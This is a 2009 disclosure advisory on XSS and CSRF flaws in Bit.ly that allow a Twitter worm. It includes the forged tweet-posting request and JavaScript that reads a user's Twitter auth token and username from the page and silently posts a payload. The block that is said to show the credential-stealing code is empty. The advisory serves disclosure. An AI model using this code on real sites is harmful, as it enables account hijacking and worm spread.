-------------------------------------------------------------------------------
Bit.ly / Twitter based worm PoC (XSS, CSRF)
-------------------------------------------------------------------------------

Author:          Mario Heiderich
Date:            2009-06-21
For:             Month Of Twitter Bugs
Release mode:    Responsible disclosure
Release date:    2009-07-01
Status:          Patched (2009-06-30)
CVE:             none provided
OSVDB:           none provided
Credit:          none provided
Severity:        moderately critical
Vendor reaction: Reaction provided but security issue(s) ignored

-------------------------------------------------------------------------------
I. Background
-------------------------------------------------------------------------------

Bit.ly (http://bit.ly) is a URL shortening service based on one of the many Betaworks (http://betaworks.com/) projects. Bit.ly was chosen by Twitter to be the official URL shortening service used in the Twitter web interface. Bit.ly is involved in the funding of TweetDeck.

News regarding Bit.ly

* http://gigaom.com/2009/03/30/betaworks-raises-around-2m-for-bitly-spins-it-out/
* http://www.readwriteweb.com/archives/bitly_alternative_to_tinyurl.php

-------------------------------------------------------------------------------
II. Description
-------------------------------------------------------------------------------

Bit.ly enables sharing and distributing shortened URLs as well as advanced statistics about their usage and more. The interesting part is that users can create accounts, hand their Twitter login credentials to the Bit.ly application and then post shortened URLs directly to Twitter with one click. Since the Twitter API credentials are stored in the DOM of the Bit.ly website once the user is logged in, they can be extracted via JavaScript and reused in later requests. Bit.ly itself has a reflected XSS vulnerability in the login form and a persistent XSS vulnerability, requiring user interaction, in the shortened URL overview.
This enables:

* Stealing login credentials in clear text
* Stealing Twitter API data
* Infecting arbitrary accounts via CSRF
* Propagating the payload via Twitter, infecting other users' accounts

-------------------------------------------------------------------------------
IV. Examples
-------------------------------------------------------------------------------

The first code example demonstrates how to log Bit.ly users out of their account and steal the login credentials in clear text. Afterwards the user is logged in again, probably without noticing the attack. The attack relies on the user agent's password manager pre-filling the login form; depending on the user agent, a timeout may be needed before reading the pre-filled values for this PoC to work.

<<<
>>>

Now, to be able to post shortened URLs to Twitter, the request has to be examined - it turns out to be a regular GET request looking like this:

<<<
http://bit.ly/account/tweet
    ?body=<%THE_MESSAGE_BODY%>
    &twitter_password=undefined
    &selected_account_login=<%THE_TWITTER_USERNAME%>
    &selected_account_type=twitter
    &token=<%THE_TWITTER_AUTH_TOKEN%>
>>>

Both required values - the Twitter user name and the Twitter auth token - can be extracted right from the DOM of the Bit.ly website, as demonstrated below. The following JavaScript illustrates that, and also how to forge an XHR that fires the request including the authentication data and the payload. The message body can of course be chosen freely and filled with an infected Bit.ly URL or any other payload.

<<<
var token = Bitly.token;                                  // Twitter auth token from the DOM
var login = SHARE_FORM.linked_accounts[0].account_login;  // Twitter user name from the DOM
var body  = '<%THE_MESSAGE_BODY%>';                       // e.g. an infected Bit.ly URL
var url = 'http://bit.ly/account/tweet?body=' + encodeURIComponent(body)
    + '&twitter_password=undefined&selected_account_login=' + encodeURIComponent(login)
    + '&selected_account_type=twitter&token=' + encodeURIComponent(token);
var xhr = new XMLHttpRequest();      // same-origin request, so the session cookies are sent along
xhr.open('GET', url, true);
xhr.send(null);
>>>

The body could for example contain a Bit.ly shortened URL that redirects to a website containing the markup shown above. After clicking the link the victim - if logged into Bit.ly - would be logged out too, get his/her account data stolen and propagate the payload afterwards.

-------------------------------------------------------------------------------
V. Conclusion
-------------------------------------------------------------------------------

Neither the Twitter API nor most of the Twitter API partners provide good protection for their users against CSRF, XSS and worm-like attacks. The MoTB is meant to point that out in a perhaps rather drastic way, which - as this example shows - is most of the time the only way left. Stealing email addresses together with passwords can also be the first step in a series of attacks against user accounts, since it's easy to build tools that automatically check if and where the collected credentials work as well.
Even if the impact for the platforms themselves - in this example Bit.ly and Twitter - might be rather moderate, the dangers for the trusting users are most notable. This document only describes attacks against Bit.ly and Twitter, but tests have shown that almost all popular URL shortening and media distribution services out there are vulnerable to CSRF and XSS attacks; most of the vulnerabilities can be described as low hanging fruit. Those include, amongst many others:

* ow.ly
* is.gd
* addthis.com

Hopefully the MoTB will not only illustrate the dangers of insecure APIs and API partners regarding XSS, CSRF and worm-like attacks but also push vendors to understand and fix the vulnerabilities and risks they created. The currently experienced ignorance regarding the security and privacy of the registered users is an unacceptable and rather shocking state.

-------------------------------------------------------------------------------
VI. Disclosure Timeline
-------------------------------------------------------------------------------

* 2009-05-17 Vulnerabilities were found
* 2009-05-18 Vendor was contacted
* 2009-05-19 Vendor responded
* 2009-05-20 Subset of vulnerabilities was fixed
* 2009-05-21 Vendor was informed about more existing problems
* 2009-06-16 Vendor was contacted again due to lack of response
* 2009-06-21 Document was created
* 2009-06-21 Vendor was contacted again - this document attached
* 2009-07-01 Planned public release for MoTB